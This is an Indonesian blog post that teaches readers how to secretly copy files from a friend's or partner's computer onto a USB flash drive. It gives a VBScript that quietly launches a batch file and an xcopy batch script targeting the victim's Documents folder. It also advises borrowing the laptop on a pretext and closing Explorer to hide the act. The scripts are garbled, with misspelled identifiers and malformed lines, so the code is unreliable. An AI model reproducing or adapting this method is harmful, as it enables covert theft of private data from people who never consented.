Hack data komputer orang lain

Hack data komputer bermodal nama komputer dan users

Siapa yang tidak senang jail hack data orang lain?
Saya akan memberikan anda sebuah trik mencuri/membajak data orang, teman, pacar, dengan hanya bermodal nama komputer dan users target (Documents) tanpa sepengetahuan korban.


Untuk melakukan hal ini, Anda tentunya perlu menyiapkan sebuah Flashdisk dan sesuaikan kapasitas Flashdisk sesuai dengan ukuran file yang akan anda bajak. Misanlnya kapasitas file yang anda bajak adalah 1 GB, Tetapi ukuran flashdisk anda hanya 512 MB, Tentunya tidak semua file yang anda bajak dapat anda proleh.

Terlebih dahulu siapkan senjata anda yaitu Flashdisk

Perrtama, yang harus anda lakukan adalah membuka Notepad sebagai tempat untuk mengetikkan script berikut ini (Tanpa tanda petik)
''dim wshshell, dos
set wshshell = wscript.createobject("wscript.shell")
dos = wshell.expandenvironmentsrings("%comspec%")
wshsell.run (dos & " /c datacopy.bat"), vbhide''










Setelah selesai mengetikkan script di atas, simpan file tersebut di Flashdisk anda dengan nama "data.vbs" pada saat menyimpan data.vbs, dalam kotak dialog save as, pastikan anda pilih All files terlebih dahulu, barulah anda bisa menyimpan dengan menekan tombol Save

Kedua, sekarang kita akan membuat file yang kedua, bukalah halaman Notepad anda yang baru, dan ketik lagi script berikut ini. (Tanpa warna)
 @echo off
"mkdir %computername%
xcopy "D:\Gambarku\*.*" %computername% /s/c/q/r
@cls
Qexit"

Baca penjelasan berikut ini (Penting)
  1. Perintah mkdir akan membuat sebuah folder sebagai tempat untuk menaruh file hasil bajakan. Nama folder ini akan di buat secara otomatis sesuai dengan nama komputer target
  2. Perintah xcopy "D:\Gambarku\*.*" %computername% /s/c/q/r hal ini berarti kita akan membajak data yang tersimpan dalam drive "D:" Foldernya adalah "Gambarku". Jika anda hanya ingin mengambil jenis file decument (DOC) Maka anda bisa mengganti *.* dengan *.doc.
  3. computername adalah nama komputer target
  4. Simpan dulu script tersebut dengan nama datacopy.bat
Nama komputer dan Users hanya berlaku pada My Documents. Jadi anda tinggal merubah script di atas yang berisikan "D:\Gambarku\ menjadi "C:\Users\nama-user\Documents\*.* %computername% /s/c/q/r (Anda akan membajak folder Documents)

Perlu anda ketahui:
Semua komputer mempunyai C:\Users\ dan \Documents\ jadi yang pasti anda ubah adalah nama Users dan nama computer target.

Misalnya: Nama Users komputer saya Effendi dan nama computer saya SONY, Jadi anda harus menulis dan menyimpan script tersebut dengan

@echo off
"C:\Users\Effendi\Documents\*.*%SONY% /s/c/q/r
@cls
Qexit

Menjalankan Aksi

Setelah anda membuat kedua file di atas, masing masing nama file tersebut adalah "data.vbs" dan "datacopy.bat" dan Tempatkan kedua file yang sudah anda buat pada folder yang sama di dalam flashdisk anda


Untuk memulai aksi pembajakan data, lakukan akting terlebih dahulu misalnya mau pinjap laptop untuk melihat isi flashdisk, pinjam buat edit dokumen dan yang lainnya. Setelah itu jalankan "datacopy.bat" Maka dengan sendirinya akan muncul CMD.

Artinya sedang mengcopy data yang sudah anda incar sebelumnya dan data tersebut akan tersalin ke dalam flashdisk anda apabila CMD Sudah keluar dengan sendirinya.
  • Semakin besar kapasitas file yang anda bajak maka semakin lama pula proses penyalinan data.
  • Untuk menyembunyikan diri bahwa anda sedang membajak data, sebaiknya anda langsung menutup Exploler ketika selesai menekan datacopy.bat. Dengan menekan tanda silang pojok atas komputer
Jika aksi berhasil tampilannya akan seperti di bawah ini:


Trik di atas sudah dapat anda terapkan dirumah, selain itu agar data-data yang anda bajak dapat terhidden (Tersembunyi) secara otomatis ketika menekan datacopy.bat, anda bisa membaca lanjutan dari artikel ini yaitu Cara hidden file dengan ampuh mengunakan Notepad

Selamat anda sudah bisa mencuri data komputer orang lain,,

3 komentar:

Post a Comment